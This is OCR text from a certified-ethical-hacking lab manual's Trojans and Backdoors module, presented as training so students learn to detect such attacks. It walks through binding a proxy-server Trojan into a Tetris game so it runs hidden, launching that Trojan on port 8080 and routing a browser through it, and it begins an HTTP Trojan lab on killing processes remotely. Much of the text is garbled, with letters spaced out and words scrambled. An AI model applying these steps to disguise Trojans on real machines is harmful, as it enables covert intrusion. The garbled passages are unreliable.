  • 16. M o d u le 0 6 - T r o ja n s a n d B a c k d o o r s Lab W r a p p in g a T r o ja n U s in g O n e F ile EX E M aker A Trojan is a program th a t contains m alicious or harm ful code inside apparently harm lessprogram m ing or data in such a way th a t it can g e t control and cause damage, such as m ining the file allocation table on a hard drive. I CON £ 1 7 KEY V a lu a b le L a b S c e n a r io S o m e t im e s a n a tta c k e r m a k e s g e t a a v e r y s e c u r e b a c k d o o r e v e n m o r e s a fe r t h a n th e p a s s w o r d f o r in f o r m a tio n n o r m T est yo u r k n o w le d g e W e b e x e r c is e a l w a y th e to a tta c k e rs le t f r o m W o r k b o o k r e v ie w th e a s y s te m , o t th e v ic t im c o m m b a c k d o o r A c t i v e X 1 11 to o r d e r to k e e p v o ic e y o u r c r e a tin g a y a n s y s te m . m is n o r m th e in a o s t to o n ly g e t a l th e in t o fu tu r e . I t th e v is it s w e b s it e s a tta c k s b y is a la y e r s v ic t im s y s te m in . A f t e r g e t t in g a s a b a c k d o o r e a s y a tta c k e r a s s h o w a n e e d th e a b e d d e d m e s s a g e a n d p r o t e c t in g in s ta ll e m 0 1‫ ־‬v e r if y in g 0 11 r u n n in g c a n w e b s it e , T r o ja n s a n d 0 1‫ ־‬S S H th e in s ta lls a p p lic a tio n s , b a c k d o o r s o n e lo g g in g w a y u s e r o f u s e a tta c k e r A n o t h e r M a y a u th e n t ic a tio n s h a r d e r a c c e s s f r o m a n d m a n y d o w n lo a d in g s y s te m T r o ja n s it lie n e v e r c h a t, u s e r w it h a c h in e . W a l n e e d a tta c k e r , 0 1‫ ־‬h e r m th e 0 1 1 f o r p r o t e c t 0 1 1 111s n o r m m p a r e d b y A c t iv e X . r u n A U s u a lly c o m v ic t im u s in g A c t i v e X k n o w le d g e s y s te m . s y s te m th e 0 1 1 is s y s te m . b a c k d o o r th e v ic t im c o u ld r u n n in g a b a c k d o o r s s y s te m a n d in t o b u t u s e in s ta lle d c o n t r o l ‫ט‬ to u s in g th e a b o u t u s e r . e x t e n s iv e s y s te m f r o m a tta c k e rs . Y o u a re in c lu d e t h e ft & Tools a s e c u r ity p r o t e c t in g o f v a lu a b le a d m th e d a ta in is t r a t o r n e t w o r k f r o m o f y o u r f r o m th e c o m p a n y , T r o ja n s n e t w o r k , a n d a n d a n d y o u r jo b b a c k d o o r s , id e n t it y r e s p o n s ib ilit ie s T r o ja n a tta c k s , th e ft. L a b O b je c t iv e s demonstrated in this lab are T h e available in a tta c k s . o b je c t iv e o t t in s la b is to h e lp s m d e n ts le a r n to d e te c t T r o ja n a n d b a c k d o o r D EH :C T h e o b je c tiv e s o f th e la b in c lu d e : ToolsCEHv8 Module 06 Trojans ■ W r a p p in g ■ R u n n in g a T r o ja n w it h a g a m e 111 W in d o w s S e r v e r 2 0 0 8 and Backdoors C E H La b M anual Page 439 th e T r o ja n to a c c e s s th e g a m e 0 1 1 th e f r o n t e n d E th ic a l H ack in g and Counterm easures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Stricdy Prohibited.
  • 17. M o d u le 0 6 - T r o ja n s a n d B a c k d o o r s ■ A n a ly z in g th e T r o ja n r u n n in g in b a c k e n d L a b E n v ir o n m e n t T o c a r r y ‫י‬ o u t d iis , y o u n e e d : OneFileEXEMaker t o o l lo c a t e d D:CEH-ToolsCEHv8 Module 06 a t Trojans and BackdoorsWrapper Covert ProgramsOneFileExeMaker ■ A Window Server 2012 c o m p u t e r r u n n in g ■ Windows Server 2008 ■ I t y o u th e 111 ■ d e c id e la b m t o d o w n lo a d ig h t A d m in is tr a tiv e r u n n in g th e (h o s t) 111 v ir t u a l m a c h in e latest version, t h e n s c r e e n s h o ts s h o w n d if f e r p r iv ile g e s to m n t o o ls L a b D u r a t io n T u n e : 2 0 M in u t e s O v e r v ie w o f T r o ja n s a n d B a c k d o o r s A T r o ja n h a r m le s s is a d a m a g e , s u c h Note: w h a t d ie H TASK 1 OneFile EXE Maker T h e is 111 p r o g r a m d ia t p r o g r a m m in g a s d ie p ro c e s s e s la b , is o f b u t s a m e d a ta d ie r u in in g v e r s io n s c o n t a in s o r h ie d ie d ie a s 111 malicious s u c h a llo c a tio n c r e a te d c lie n t a c tu a l p ro c e s s s h o w n 111 d iis a w a y t a b le o r o f o r th a t o n a h o s t h a r m fu l it h a rd a n d c o n n e c t in g c o d e in s id e a p p a r e n d y get control c a n a n d c a u s e d n v e . a p p e a r a n c e to d ie m a y s e r v e r d itfe r a n d fr o m a c c e s s in g la b . La b T ask s 1. In s ta ll OneFileEXEMaker S e n n a S p y O n e EX E M a k e r 2 0 0 0 o n Windows Server 2008 V ir t u a l M a c h in e . 2 .0 a S e n n a S p y O n e E X E M aker 2000 - 2.0a Official Website: e-m a il: http://sennaspy.tsx org s e n n a _ s p y 0 h o lm a 1l.c o m IC Q U IN 3973927 J o in m a n y file s a n d m a k e a u n iq u e E X E file . T h is p io g ra m a llo w io in a ll k in d o f file s : e x e , d ll. o c x . t x t . jp g . b m p A u to m a tic O C X f ile re g is te r a n d P a c k file s s u p p o rt W in d o w s 9 x . N T a n d 2 0 0 0 c o m p a tib le ! S h o rt F ile N a m e P a ra m e te rs 10 p e n M o d e | C o p y T o Command Line Parameters. m Open Mode C o p y rig h t ( C ) . 1 9 9 8 - 2 0 0 0 . B y S e n n a S p y F IG U R E C E H La b M anual Page 440 Copy To--- | A c tio n Action--- pnEeue C Nr a (“Wdw C Oe/xct om l ino s C Mime C Sse C CpOly a izd yt m x oy n C Mime C Tm in izd ep C Ro ot C He id 3 .1 : O n e F i l e E X E r P a ck Fies? M a k e r H o m e s creen E th ic a l H ack in g and Counterm easures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Stricdy Prohibited.
  • 18. M o d u le 0 6 - T r o ja n s a n d B a c k d o o r s C lic k d ie a d d Add File b u tto n a n d b r o w s e to th e C E H - T o o ls fo ld e r a t Z:CEHv8 Module 06 Trojans and BackdoorsGamesTetris lo c a t io n Lazaris.exe th e d ie a n d lile . S e n n a S p y O n e EXE M a k e r 2 0 0 0 - 2 .0 a S e n n a S p y O n e E X E M aker 2000 - 2.0a Official Website: http://sennaspy tsx org le s s ! Y o u c a n s e t v a r io u s e-m a il: t o o l o p t io n s a s O p e n s e n n a _ s p y @ h o tm a 1l.c o m m o d e , C o p y to , A c t io n IC Q U IN 3973927 J o in m a n y file s a n d m a k e a u n iq u e E X E file . T h is p ro g ra m a llo w jo in a ll k in d o f file s : e x e . d ll. o c x . t x t . jp g . b m p . A u to m a tic O C X f ile re g is te r a n d P a c k file s s u p p o rt W in d o w s 9 x . N T a n d 2 0 0 0 c o m p a tib le ! [ s h o r t F ile N a m e |P a r a m e t e r s | 0 p e n M o d e |C o p y T o L A Z A R IS .E X E H id e S y s te m | A c tio n ! A dd F ie | O p e n /E x e c u te 1 Getete S ave Ejj* C r C (5‫־‬ C o p y rig h t ( C ) . 1 9 9 8 - 2 0 0 0 . B y S e n n a S p y F IG U R E 3 . Add File C lic k Copy T 0 ------- Open Mode Command Line Parameters a n d b r o w s e Normal Maximized Minimized Hide C (* C C W indows System Temp Root (• Open/Execute C Copy On|y 3 .2 : A d d i n g L a z a r i s g a m e to th e C E H - T o o ls fo ld e r a t d ie lo c a t io n Z:CEHv8 Module 06 Trojans and BackdoorsTrojans TypesProxy Server Trojans a n d a d d d ie mcafee.exe file . S e n n a S p y O n e E X E M aker 2000 - 2.0a Official Website: http://sennaspy.tsx.org e-m a il: s e n n a _ s p y @ h o tm a il.c o m IC Q U IN 3973927 J o in m a n y file s a n d m a k e a u n iq u e E X E file . T h is p ro g ra m a llo w jo in a ll k in d o f file s : e x e . d ll. o c x . t x t . jp g . b m p A u to m a tic O C X f ile re g is te r a n d P a c k file s su p p o rt W in d o w s 9 x . N T a n d 2 0 0 0 c o m p a tib le I & Tools demonstrated in S h o rt F ile N a m e P a ra m e te rs | O pen M ode | Copy To |A c tio n S y s te m I S y s te m this lab are A dd F ie O p e n /E x e c u te | O p e n /E x e c u te dlee et available in Save D EH :C ToolsCEHv8 Command Line Parameters O pen Mode Module 06 Trojans and Backdoors C o p y rig h t ( C ) . 1 9 9 8 - 2 0 0 0 . B y S e n n a S p y F IG U R E 4 . C E H La b M anual Page 441 S e le c t Mcafee a n d ty p e C C C (* Normal Maximized Minimized Hide Copy To!------C (* ‫׳‬ C W indows System Temp Root Action--( • Operv‫׳‬Execute C r P a c k F ie s ? Copy Only 3 .3 : A d d i n g M C A F E E . E X E p r o x y s e r v e r 8080 1 1 1 d ie Command Line Parameters fie ld . E th ic a l H ack in g and Counterm easures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Stricdy Prohibited.
  • 19. M o d u le 0 6 - T r o ja n s a n d B a c k d o o r s S e n n a S p y O n e EX E M a k e r 2 0 0 0 2 .0 a S e n n a S p y O n e E X E M aker 2000 2.0 ‫־‬a Official Website e-m a il: http://sennaspy.tsx org s e n n a _ s p y @ h o tm a il.c o m IC Q U IN : 3973927 J o in m a n y file s a n d m a k e a u n iq u e E X E file . T h is p io g ra m a llo w !o in a ll k in d o f file s : e x e . d ll. o c x . t x t . jp g . b m p A u to m a tic O C X f ile !e g is te i a n d P a c k file s s u p p o rt W in d o w s 9 x . N T a n d 2 0 0 0 c o m p a tib le ! S h o rt F ile N a m e P a ia m e te r s O pen M ode Copy To A c tio n S y s te m L A Z A R IS .E X E O p e n /E x e c u te O p e n /E x e c u te Sv ae Command Line Parameters: O pen M ode— C o p y rig h t ( C ) . 1 9 9 8 - 2 0 0 0 . B y S e n n a S p y F IG U R E 5. S e le c t Lazaris a n d c h e c k S e n n a S p y O n e EX E M a k e r 2 0 0 0 d ie Copy To------- Normal Maximized Minimized Hide C C C ^ C (* C O p en/Execute W indows System Temp Root ‫“י‬ P *k F te s ? Copy On|y C 3 .4 : A s s i g n i n g p o r t 8 0 8 0 t o M C A F E E Normal o p t io n in Open Mode. 2 .0 a S e n n a S p y O n e E X E M aker 2000 2.0 ‫־‬a Official Website: http://sennaspy tsx org e-m a il: s e n n a _ s p y @ h o tm a il.c o m IC Q U IN 3 9 /3 9 2 7 J o in m a n y file s a n d m a k e a u n iq u e E X E file . T h is p io g ra m a llo w jo in a ll k in d o f file s : e x e . d ll. o c x . t x t . ip g . b m p ... A u to m a tic O C X f ile re g is te r a n d P a c k file s s u p p o rt W in d o w s 9 x . N T a n d 2 0 0 0 c o m p a tib le ! A dd F ie L A Z A R IS .E X E M C A FE E EXE N o tm a l 8080 ( S y s te m H id e I O p e n /E x e c u te I S y s te m Delete O p e n /E x e c u te Sv ae Exit O pen Mode Command Line Parameters Copy To------- ‫. ־׳‬Maximize : .01™ Jaximized 1p ‫״‬ ^ © 2 C o p y rig h t ( C ) . 1 9 9 8 2 0 0 0 . B y S e n n a S p y F IG U R E 6 . C lic k Save a n d b r o w s e to C C Minimized Hide C W indows <• System C Temp C Root Action ( • Operv‫׳‬Execute C r P a ck Fies? Copy On|y 3 .5 : S e t t i n g L a z a r i s o p e n m o d e s a v e d ie d ie o n th e d e s k to p , a n d n a m e d ie t ile Tetris.exe. C E H La b M anual Page 442 E th ic a l H ack in g and Counterm easures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Stricdy Prohibited.
  • 20. M o d u le 0 6 - T r o ja n s a n d B a c k d o o r s Save n 1 Name e-m a il: sennas | K 2 [ *■ I - I Size 0‫נ® ־‬ 1*1 Type ₪ ‫־‬ a 1 *1 D ate modified 1 ^ b Pu k : ■ Computer ® N e tw o rk ® M o z ia F re fb x £ 1 KB Shortcut 2 KB Google Chrome Shortcut 9 /1 8 /2 0 1 2 2:3 1 Af 9 /1 8 /2 0 1 2 2 :3 0 AT _l S h o rt F ile N a m e (Executables (*.exe) M C A F E E .E X E ±1 |------- Save------- 1 |t * H Cancel _^J | Save L O pen M ode ‫־‬ ( • C C C C o p y rig h t (C ). 1 9 9 8 - 2 0 0 0 . B y S e n n a S p y F IG U R E m 7 . N o w d o u b le - c lic k M C A F E E . E X E w ill , ru n in b ack g ro u n d g am €> to o p e n d ie Copy To Normal Maximized Minimized Hide C (* (" C W indows System Temp Root ( • Open/Execute C r P a ck Fies? Copy 0 n|y 3 .6 : T r o j a i i c r e a t e d Tetris.exe file . T liis w ill la u n c h d ie L a z a r is it McAfee , 011 t h e tr0 1 1 t e ‫ ״‬d • r F IG U R E 8 . C E H La b M anual Page 443 N o w is o p e n Task Manager a n d 3 .7 : L a c lic k d ie 2a r is g a m e Processes m n n in g . ta b to c h e c k E th ic a l H ack in g and Countenneasures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Stricdy Prohibited.
  • 21. M o d u le 0 6 - T r o ja n s a n d B a c k d o o r s ^ ‫[*[ ס‬ O Windows Task M anager File O ptions V iew Applications Help P ro ce s s e s j Se rv ic e s | P erfo rm a n c e j Netw orking | U s e rs | Im a g e . . . 1 U ser Nam e 1 c p u ] [ M em ory (. .. | Description cs rs s .ex e SY ST E M 00 1 .4 6 4 K Client S e r . .. cs rs s .ex e SY ST E M 00 1 .7 3 6 K Client S e r ... d w m .e x e Adm lnist... 00 1,200 K D e s k t o p ... ex p lo re r.e x e Adm m ist.. . 00 14,804 K L A Z A R IS .E X E ... Adm lnist. .. 00 1 .5 4 0 K Is a ss .ex e SY ST E M 00 3,100 K Local S e c u ... Ism. e x e SY ST E M 00 1 .3 8 4 K | Local S e s s ... 1 M C A F E E .E X E .. . 1 W in d o w s . . . L A Z A R IS A d m n s t ... 00 580 K m sd tc.ex e N ET YV O ... 00 2 .8 3 2 K S c re e n p re s s o ... . Adm inlst. .. 00 2 8 .3 8 0 K S c re e n p r e ... s e rv ic e s .e x e SY ST E M 00 1 .9 9 2 K Se rv ic e s a .. . S L s v c .e x e N E T V /O . .. 00 6 .7 4 8 K M ic ro s o ft... sm ss.ex e SY ST E M 00 304 K W in d o w s ... s p o o ls v .ex e SY ST E M 00 3 .5 8 8 K Sp oo ler S . . . s v c h o s t.e x e SY ST E M 00 13,508 K H o s t P r o c ... s v c h o s t.e x e LO C A L ... 00 3.648 K H o s t P r o c ... - I* M C A FEE M S D T C co ... Sh o w p ro cesses from all u sers | jP ro :e s s e s : 40 C P U U s a g e : 2°.‫׳‬c F IG U R E ■ gnc| p rocess Ph ysical M em ory: 43°.‫׳‬c 3 .8 : M C A F E E i n T a s k m a n a g e r L a b A n a ly s is A n a ly z e y o u r a n d t a r g e t ’s d o c u m e n t s e c u n ty th e r e s u lts p o s tu r e a n d r e la te d to e x p o s u r e d ie la b th ro u g h e x e r c is e . p u b lic a n d G iv e fre e y o u r o p in io n o n in f o r m a tio n . PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB. T o o l / U t i l i t y In f o r m E a k e r O X E M a t i o n u t p u t : C o l l e c t e d / O U s in g a b a c k d o o r b j e c t i v e s e x e c u te A c h i e v e d Tetris.exe Q u e s t io n s 1. U s e O 2 . C E H La b M anual Page 444 v a r io u s o th e r n e F ile E X E M H o w y o u o p t io n s a k e r w ill s e c u re a n d fo r d ie a n a ly z e y o u r O p e n th e c o m p u t e r m o d e , C o p y to , A c t io n s e c t io n s o f r e s u lts . fr o m O n e F ile E X E M a k e r a tta c k s ? E th ic a l H ack in g and Counterm easures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Stricdy Prohibited.
  • 22. M o d u le 0 6 - T r o ja n s a n d B a c k d o o r s In t e r n e t □ Y e s P la t f o r m 0 C E H La b M anual Page 445 C o n n e c t io n R e q u ir e d 0 N o 0 iL a b s S u p p o r t e d C la s s r o o m E th ic a l H ack in g and Countem ieasures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Stricdy Prohibited.
  • 23. M o d u le 0 6 - T r o ja n s a n d B a c k d o o r s P ro x y S e r v e r T ro ja n A . Trojan is a program th a t contains m alicious or harm ful code inside apparently harm less program m ing or data in such a way th a t i t can g et control and cause damage, such as m ining the file allocation table on a hard drive. I CON KEY P~/ Valuable information L a b S c e n a r io Y o u a re in c lu d e Test vom ‫׳‬ knowledge — Web exercise m Workbook review t h e ft a s e c u r ity a d m p r o t e c t in g o f v a lu a b le in is t r a t o r th e d a ta n e t w o r k f r o m o f y o u r f r o m th e c o m p a n y , T r o ja n s n e t w o r k , a n d a n d a n d y o u r jo b b a c k d o o r s , id e n t it y r e s p o n s ib ilit ie s T r o ja n a tta c k s , th e ft. L a b O b je c t iv e s T h e o b je c tiv e o f t in s la b is to h e lp s tu d e n ts le a r n to d e te c t T r o ja n a n d b a c k d o o r a tta c k s . T h e o b je c tiv e s o f t in s • S t a r tin g M • A c c e s s in g la b c A f e e th e in c lu d e : P r o x y In t e r n e t u s in g M c A le e P r o x y L a b E n v ir o n m e n t T o c a r r y o u t t in s , y o u ■ McAfee n e e d : T r o ja n lo c a t e d D:CEH-ToolsCEHv8 Module 06 Trojans and a t BackdoorsTrojans TypesProxy Server Trojans JT Tools ■ demonstrated in this lab are A c o m p u t e r m n n in g Window Server 2012 ■ Windows Server 2008 m n n in g in (h o s t) v ir t u a l m a c h in e available in D EH :C - ■ ToolsCEHv8 I f 111 y o u th e d e c id e la b t o m ig h t a w e b d o w n lo a d th e latest version, t h e n s c r e e n s h o ts s h o w n d if f e r Module 06 Trojans ‫י‬ Y o u ‫י‬ and Backdoors n e e d A d m in is tr a tiv e b r o w s e r p r iv ile g e s to to a c c e s s r u n In t e r n e t t o o ls L a b D u r a t io n T im C E H La b M anual Page 446 e : 2 0 M in u t e s E th ic a l H ack in g and Countem ieasures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Stricdy Prohibited.
  • 24. M o d u le 0 6 - T r o ja n s a n d B a c k d o o r s O v e r v ie w o f T r o ja n s a n d B a c k d o o r s A T r o ja n h a r m le s s is a Note: d ie £ TASK Proxy server th a t p r o g r a m m in g d a m a g e , s u c h w h a t p r o g r a m T h e it is 111 a s v e r s io n s d ie p ro c e s s e s o r la b , is o f h ie th e b u t s a m e d a ta d ie r u in in g as malicious c o n t a in s in s u c h c re a te d d ie a a llo c a tio n c c lie n t a c tu a l p ro c e s s s h o w n 111 d iis w a y t a b le o r 0 1‫ ־‬h a r m fu l th a t 0 11 a h o s t it a n d in s id e a n d c a u s e d iffe r fr o m d r iv e . a p p e a r a n c e o f c o n n e c t in g a p p a r e n tly get control c a n h a rd c o d e to d ie m a y s e r v e r a n d a c c e s s in g la b . La b T ask s - Mcafee 1. I n W in d o w s S e r v e r 2 0 0 8 V ir t u a l M a c h in e , n a v ig a t e to Module 06 Trojans and BackdoorsTrojans Types, Proxy Server Trojans a n d CmdHere s e le c t jr a C > view fr o m d ie r ig h t- c lic k c o n te x t m e n u . |i■ * CD-v3'‫־‬ teduc05Tro:o‫««־‬nd30ccdo0f3 - "rojanaTypes Pit Z:CEHv8 a n d Edt Toos Orgsncc » ndp Vca ‫־‬ s * w S 's ® 1 ' ‫״‬ F Nn‫ - - •״‬C*»nodri«d M Tvp# j , Bt*d©«rry T'OJjn pi Documents J( T'0j*tk ,Jf Canrund 5h*l "rajjin* J j D*tac«‫׳‬rwntT0‫|׳‬an« £ Picture* ^ Mjflic M Sat M J f Destruetve Trojans J t awnonc Trojans ‫־‬ •tore » Folders JtE-f'd l r3:3rs Jk F T Tro» r J t G J: Trojars JlMTPh-TTFST'Ojans JtlO P B d C W o o ‫־‬ j.MACOSXTtoaTS ‫׳יי‬ J i Reosrv Montor _±_ | . Startup P'cgfarr* W JA ‫ ־‬rojansT/pes 3ladd>e‫־‬ry Trojan | . Comrrand Srel Trt R=nctc A < J t VMC ‫ ־‬raja j. 3ef3GemertTro;a• ( . 3estrjc&'/e “ rojor COer R»stora previOLS versions J . EbankirgT-qjarts 1. SerdTo Trojors i . '^PT'cjon i . SUIT'ojans C30V L. -TIP t-rr‫־‬P5 Tro;a C‫׳‬eare9xjrtcjt Delete I , :CKPBdCkdCOr Rename Proxy Se‫־‬ver Troji Prooenes Jg 35PtOtv TrQ* - ► Q it .. t i n m i G H ‫. ־־ :־‬ F I G U R E 4 .1 : W i n d o w s S e r v e r 2 0 0 8 : C m d H e r e 2 . N o w ty p e d ie c o m m a n d dir to c h e c k fo r fo ld e r c o n te n ts . F I G U R E 4 .2 : D i r e c t o r y l i s t i n g o f P r o x y S e r v e r f o l d e r 3 . C E H La b M anual Page 447 T h e f o llo w in g im a g e lis t s d ie d ir e c to r ie s a n d file s 111 th e fo ld e r . E th ic a l H ack in g and Counterm easures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Stricdy Prohibited.
  • 25. M o d u le 0 6 - T ro ja n s a n d B a c k d o o rs -1‫ |ם‬x |Z:C v8 M d le 0 Trojans a d BackdoorsSTrojans TypesProxy Server Trojans>dir EH ou 6 n IU olune in drive Z h s n label. a o I U lune Serial N me is 1 7 - D C o u br 6 77 A I Directory of Z:C v8 M d le 0 Trojans a d BackdoorsVTrojans TypesProxy Serve EH ou 6 n Ir Trojans 1 9 1 / 0 2 01:07A < IR 0 / 92 1 M D> 1 9 1 / 0 2 01:07A < IR 0 / 92 1 M D> 1 2 1 / 0 6 1 :4 A 0 / 72 0 1 3 M 5 8 ncafee.exe ,32 1 9 1 / 0 2 01:07A < IR 0 / 92 1 M D> W b r0 y Tr0j4nCr34t0r <u n Nn > 3P x F n y ae 1 File<s> rile^s; 5 2 bytes b,J28 ,3 8 3 D s 208,287,793,152 bytes free ir< > Z:C v8 M d le 0 Trojans a d BackdoorsSTrojans TypesProxy Server Trojans> EH ou 6 n — m FIGURE 4 : C .3 ontentsinProxyServer folder Type die command m cafee 8080 to m il the service 111 W indow s Server 2008. FIGURE 4 : Starting m .4 cafee tool onport 8 8 00 5. The service lias started 011 port 8080. 6. N o w go to W indow s Server 2012 host machine and configure the web browser to access die Internet 011 port 8080. 7. 1 1 diis lab launch Clirom e, and select Settin g s as shown 111 die 1 follow ing figure. Q m Tliis process can b e attained in any browser after settingdie LAN settings for die respective browser 2 ww w googtorofv ■ * lo*r C.pj ico* • O G o o g le XjnaNCMm- 1- ‫״‬n• ... 1‫״ ׳‬ ■ • w FIGURE 4 : Internet option of abrowser in Windows Server 2 1 .5 02 C E H La b M anual Page 448 E th ic a l H ack in g and Counterm easures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Stricdy Prohibited.
  • 26. M o d u le 0 6 - T ro ja n s a n d B a c k d o o rs 8 . C lick the Show advanced setting s 1 1 k to view the Internet settings. 11 FIGURE 4 : Advanced Settings of Chrome Browser .6 9. 1 1 N etw ork Settin gs, click Change proxy settings. 1 C 0 chcyn r cv/dV flM ttnpt/ O .'M I Clvotue Settings 4 Enitoir AutaMtc M Ml *«Dtom n *u«9« c»rt. VUu)tAdofl1<nflf( M e ttmric focgkOvcmt isu9ncy»<»compute;s>tt«rnpo*>s«rtnastccon>1ectc the r t>o fc < ><. | OwypwstBnjt- it (U M jtwn r 1l* ju9 I w Q th « > n * « Downoads C laadkcabot: C.'lherrAi r ovm nncti rt0AT0T 1 o> i t < U Ast »hw 1 mt «Kt! lit M m dw 0 < 0 »«1 > «9 M TTPS/SM . FIGURE 4 : C .7 hangingproxyse g ofC ttin s hrom Browser e 10. 1 1 die Internet Properties w indow click LAN setting s to configure 1 proxy settings. C E H La b M anual Page 449 E th ic a l H ack in g and Counterm easures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Stricdy Prohibited.
  • 27. M o d u le 0 6 - T ro ja n s a n d B a c k d o o rs Internet Properties General [ Security ] Privacy ] Content Connections | Programs ] Advanced To set up an Internet connection, dick Setup. Setup Dial-up and Virtual Private Network settings Choose Settings if you need to configure a proxy server for a connection. (•) Never cfal a connection O Dial whenever a network connection is not present O Always dal my default connection Current Sgt default None Local Area Network (LAN) settings ------------------------------------------------LAN Settings do not apply to dial-up connections. Choose Settings above for dial-up settings. OK ] | | LAN settings Cancel J | ftpply FIGURE 4 : LAN Setting ofaC .8 s hrom Browser e 11. 1 1 die Lo cal A rea N etw ork (LA N ) Settin g s w indow, select die U se a 1 proxy server for your LAN option 111 the Proxy server section. 12. En ter die IP address o f W indow s Server 2008, set die port number to 8080, and click OK. FT Local Area Network (LAN) Settings Automatic configuration Automatic configuration may override manual settings. To ensure the use of manual settings, disable automatic configuration. @ Automatically detect settings ‫ ח‬Use automatic configuration script Address Proxy server Use a proxy server for your LAN (These settings will not apply to dial-up or VPN connections). Address: 10.0.0.13 Port: 8080 Advanced I IBypassp x server far lo a a d ss s! ro y c l d re e OK Cancel FIGURE 4 : Proxyse g ofLAN inC .9 ttin s hrom Browser e 13. N o w access any web page 111 die browser (example: www.bbc.co.uk). C E H La b M anual Page 450 E th ic a l H ack in g and Counterm easures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Stricdy Prohibited.
  • 28. M o d u le 0 6 - T ro ja n s a n d B a c k d o o rs FIGURE 4 0 Accessingweb p eusingproxy server .1 : ag 14. The web page w ill open. 15. N ow go back to W indow s Server 2008 and check die command prom pt. A d m in istra to r C:W m dow* s y *te m 3 2 c m d .e x e - m c a fe e 8 0 8 0 m Accessingweb p e ag usingproxy server ww w .google.co : /conplete/search?sugexp= chrom e,nod= 18&client=h n 8 l= r :1 0 c ro e rh e 2 0 .U 8 = b.co-| S rq b c Accepting Nw Requests■ e ww w .google.co :1 0 20 /conp lete/search?sug = exp chrom e,nod 188tclient sch n 8 l= n = ‫ ־‬ro e rh e l~U q= S& bbc.co.u Accepting Nw Requests! e Accepting Nw Requests! e Accepting Nw R q e e e u■ * * ‫^ ־‬ /co lete/search?sugexp chroroe,nod 188tclient =h n 8 l= r np = = c ro e th e l- S& b c.co.uk U a= b | / :bbc.co.uk :1 0 31 H c c e p t i n g N ew Kequests ■ Accepting Nw Requests■ e / :ww w.bbc.co.uk :1 0 20 Accepting Nw Requests! e Accepting Nw Requests■ e Accepting Nw Requests! e Accepting Nw Requests! e Accepting Nw Requests■ e Accepting Nw Requests! e Accepting Nw Requests! e static .bbci.co.uk: /franeworks/barlesque/2.10.0/desktop/3.5/style/r*ain.css :2 0 0! Accepting Nw Requests■ e static.bbci.co.uk: /bbcdotcon/0.3.136/style/3pt_ads .css :20 ! 0 Accepting Nw R e equests!____________________________________________ FIGURE 4 1 Background information on Proxy server .1 : 16. You can see diat we had accessed die Internet using die proxy server Trojan. L a b A n a ly s is Analyze and document die results related to die lab exercise. G ive your opinion on your target’s security posture and exposure dirough public and tree inform ation. C E H La b M anual Page 451 E th ic a l H ack in g and Counterm easures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Stricdy Prohibited.
  • 29. M o d u le 0 6 - T ro ja n s a n d B a c k d o o rs P LEA S E TALK TO YOUR I N S T R U C T O R IF YOU HAVE Q U E S T IO N S R E L A T E D T O T H I S LAB. T o o l/ U tility In fo rm a tio n C o lle c te d / O b je ctive s A ch ie ve d Pro x y Server T ro ja n O u tp u t: U se the proxy server T rojan to access the In tern et Accessed webpage: w w w .bbc.co.uk Q u e s t io n s 1. Determ ine whether M cAfee H T T P Proxy Server Trojan supports other ports that are also apart from 8080. 2. Evaluate the drawbacks o f using the H T T P proxy server Trojan to access the Internet. In te rn e t C o n n ectio n R e q u ire d 0 Y es □ No P la tfo rm Su p p o rted 0 C lassro om C E H La b M anual Page 452 □ !Labs E th ic a l H ack in g and Counterm easures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Stricdy Prohibited.
  • 30. M o d u le 0 6 - T ro ja n s a n d B a c k d o o rs H T T P T ro ja n A . T ro ja n is a p ro g ra m th a t c o n ta in s m a lic io u s o r h a rm fu l co d e in s id e a p p a re n tly h a rm le s s p ro g ra m m in g o r d a ta in d am ag e, su ch a s m in in g th e f ile I CON KEY / V a lu a b le ' in fo r m a tio n S T est yo u r k n o w l e d g e ____________ * W e b e x e rc is e su ch a lr a y th a t it ca n g e t c o n tro l a n d cau se a llo c a tio n ta b le o n a h a rd d riv e . L a b S c e n a r io Hackers have a variety ot m otives fo r installing m alevolent softw are (m alw are). This types o f softw are tends to vield instant access to the system to continuously steal various types o f inform ation from it, fo r exam ple, strategic com pany’s designs 01‫ ־‬num bers o f credit cards. A backdoor is a program or a set o f related program s that a hacker installs 011 the victim com puter to allow access to the system at a later tim e. A backdoor’s goal is to rem ove the evidence £ Q ! W o r k b o o k r e v ie w o f in itia l entry from the systems log. H acker— dedicated websites give examples o f m any tools that serve to in stall backdoors, w ith the difference that once a connection is established the intruder m ust log 111 by entering a predefined password. Y o u are a Secu rity A dm inistrator o f your com pany, and your job responsibilities include protecting the netw ork from Trojans and backdoors, T rojan attacks, theft o f valuable data from the netw ork, and identity theft. L a b O b j e c t iv e s The objective o f tins lab is to help students learn to detect T rojan and backdoor attacks. H Tools dem onstrated in th is lab are availab le in D:CEHToolsCEHv8 M odule 06 Trojans and Backdoors The objectives o f the lab include: • T o run H T T P T rojan 011 W indow s Server 2008 • Access the W indow s Server 2008 m achine process list using the H T T P Proxy • K ill running processes 011 W indow s Server 2008 V irtu al M achine L a b E n v ir o n m e n t To carry out diis, you need: C E H La b M anual Page 453 E th ic a l H ack in g and Countem ieasures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Stricdy Prohibited.
